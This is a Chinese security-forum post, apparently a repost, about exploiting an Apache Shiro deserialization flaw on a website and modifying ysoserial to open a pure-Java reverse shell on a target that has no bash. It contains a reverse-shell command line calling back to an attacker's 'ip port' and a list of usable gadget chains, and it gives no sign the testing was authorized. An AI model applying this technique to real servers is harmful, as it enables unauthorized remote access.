安全矩阵

 找回密码
 立即注册
搜索
查看: 6578|回复: 0

记一次突破反弹shell

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-11-13 21:32:22 | 显示全部楼层 |阅读模式
原文链接:记一次突破反弹shell

背景

某天闲着无聊,小伙伴发来一个某网站,说只能执行命令,不能反弹shell。


测试
对着目标站点一顿测试。


发现确实存在shiro反序列化,并且存在可以利用的gadget。

利用

发现确实可以执行命令,但是我们执行反弹的时候。

反弹不回来,emmm。
查看各种系命令以及分析。
发现是一个精简的Linux,经常用于docker环境的搭建。

并没有bash环境。

使用sh命令反弹结果一样,之后尝试了各种反弹的方法,一言难尽。
所以我们需要一种新的反弹方法,利用java直接创建一个socket反弹。

ysoserial
ysoserial是一款在Github开源的知名java 反序列化利用工具,里面集合了各种java反序列化payload。
源码下载地址:
https://codeload.github.com/frohoff/ysoserial/zip/master
在很多java类的反序列化攻击场景中会利用到该工具。
例如:apache shiro反序列化,会使用ysoserial生成反序列化语句,再使用key加密,发送攻击payload。
如下python脚本,就是利用ysoserial生成反序列化语句,再用key加密生成cookie。


目的
各种各样的反弹shell注入bash、sh、perl、nc、python等等,都比较依赖目标系统的环境和操作系统类型等等,如果可以直接利用java创建一个socket反弹shell则可以无需关心这些环境直接反弹shell。

ysoserial分析
在执行ysoserial的时候一般使用的命令是java -cp ysoserial.jar  /某个payload/ /命令/
打开源码分析对应的payload类执行过程,如CommonsCollections2。

在执行该类的时候,运行payloadrunner类的run方法,来执行本类的class文件,再加上接收的参数,跟入payloadrunner类。

这里会调用payload中的getObject方法传入要执行的命令,命令是接收的输入或者是getDefaultTestCmd(),也就是说我们如果不输入命令,他会执行以下默认命令。

  1. Windows:calc

  2. MacOS:calculator

  3. Linux:gnome-calculator\kclac
复制代码

如果输入了命令会执行自定义命令,接下来会执行getObject方法()来生成payload,跟入对应类的getObject方法。


getObject方法中,调用Gadgets类中的createTemplatesImpl方法生成临时的java字节码文件,跟入对应的方法。


ysoserial改造
可以看到作者在命令获取处已经留下了注释。
待做:也可以做一些有趣的事情,比如注入一个纯JavaRev/BindShell来绕过幼稚的保护。

  1. TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections
复制代码

一般情况我们在ysoserial后面写的命令调用的是java.lang.Runtime.getRuntime().exec()方法来执行命令,写死了,此处我们可以进行改造。

在原来的代码基础上写成:

这样我们再重新打包ysoserial文件再执行命令时使用如下格式。
  1. java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 "rebound:ip port"
复制代码

可以直接获得一个反弹shell。


生成payload利用


发送。

Bingo,得到一个反弹shell。


ysoserial改造总结
由于不是所有的payload在构造时都调用了Gadgets.createTemplatesImpl,所以只有以下几种适用于以上修改。

  1. CommonsBeanutils1

  2. CommonsCollections2

  3. CommonsCollections3

  4. CommonsCollections4

  5. Hibernate1

  6. JavassistWeld1

  7. JBossInterceptors1

  8. Jdk7u21

  9. JSON1

  10. ROME

  11. Spring1

  12. Spring2

  13. Vaadin1
复制代码
此方法不依赖于目标操作系统和组件,可以直接利用java创建反弹shell。














回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 13:38 , Processed in 0.015681 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表